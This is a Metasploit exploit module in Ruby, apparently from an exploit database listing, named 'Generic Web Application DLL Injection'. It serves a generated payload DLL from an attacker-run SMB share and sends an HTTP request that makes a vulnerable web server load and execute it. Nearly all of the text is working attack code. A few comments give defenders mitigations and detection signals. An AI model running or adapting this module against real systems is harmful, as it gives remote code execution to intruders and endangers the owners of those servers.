Generic Web Application DLL Injection



EKU-ID: 4623 CVE: OSVDB-ID:
Author: Matthew Hall Published: 2015-03-05 Verified: Verified


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

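# Generic module for the CWE-427 (uncontrolled search path element) class of
# web application flaw, where a request parameter ends up as the location a
# server-side process loads a DLL from.
#
# The module hosts the generated payload DLL on a built-in SMB share and then
# issues one HTTP GET whose URI is TARGETURI with the share's UNC path
# appended.
#
# Defender notes: the condition only exists when the application host can
# reach an arbitrary SMB server and loads a library from a request-supplied
# path. Egress filtering of SMB from web servers and restricting library
# loads to fixed local paths both remove it. Useful signals are UNC paths
# (\\host\share\file.dll) in query strings and outbound SMB sessions that
# originate from a web server.
class Metasploit3 < Msf::Exploit::Remote
  # Manual ranking: TARGETURI has to be set by hand for the application under
  # test; there is no check method or automatic target detection here.
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  # Registers module metadata and user options.
  #
  # @param info [Hash] metadata passed down by the framework and merged with
  #   the values declared here via update_info.
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Generic Web Application DLL Injection',
      'Description'    => %q{
        This is a general-purpose module for exploiting conditions where a HTTP request
        triggers a DLL load from an specified SMB share. This module serves payloads as
        DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would
        trigger the load of the DLL.
      },
      'Author'         =>
        [
          'Matthew Hall <hallm[at]sec-1.com>'
        ],
      'Platform'       => 'win',
      'Privileged'     => false,
      'Arch'           => [ARCH_X86, ARCH_X86_64],
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'References'     =>
        [
          ['CWE', '427']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'DefaultTarget'  => 0, # Default target is 32-bit as we usually inject into 32bit processes
      'DisclosureDate' => 'Mar 04 2015'
      ))

    register_options(
      [
        OptString.new('FILE_NAME', [false, 'DLL File name to share (Default: random .dll)']),
        OptString.new('TARGETURI', [true,  'Path to vulnerable URI (The shared location will be added at the end)', '/cgi-bin/function.php?argument=' ]),
        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10])
      ], self.class)

    # The shared file's contents are always the generated DLL (see #setup),
    # so the user-facing FILE_CONTENTS option is withdrawn.
    deregister_options('FILE_CONTENTS')
  end

  # Prepares the file to be shared: the payload rendered as a DLL, under
  # FILE_NAME when given, otherwise a random 4-6 letter name ending in .dll.
  def setup
    super

    self.file_contents = generate_payload_dll
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
    # `unc` is not defined in this file; presumably supplied by the SMB share mixin.
    print_status("File available on #{unc}...")
  end

  # Sends the single HTTP request that is expected to make the target fetch
  # the DLL: TARGETURI with the share's UNC path appended.
  #
  # The response is not inspected; the only success signal is the payload
  # being requested from the share.
  def primer
    sploit = "#{target_uri}#{unc}"

    # Log the full URI so the console output records exactly what was sent.
    print_status("#{peer} - Requesting #{sploit}")
    # Second argument is the response timeout in seconds.
    send_request_raw({
      'method' => 'GET',
      'uri' => sploit
    }, 3)
  end

  # Runs the inherited exploit routine for at most SMB_DELAY seconds.
  #
  # Running out of time is the normal way for this module to end, so the
  # timeout is swallowed and the method simply returns.
  def exploit
    Timeout.timeout(datastore['SMB_DELAY']) { super }
  rescue Timeout::Error
    # Nothing to do: finish the exploit and let the SMB server stop.
  end
end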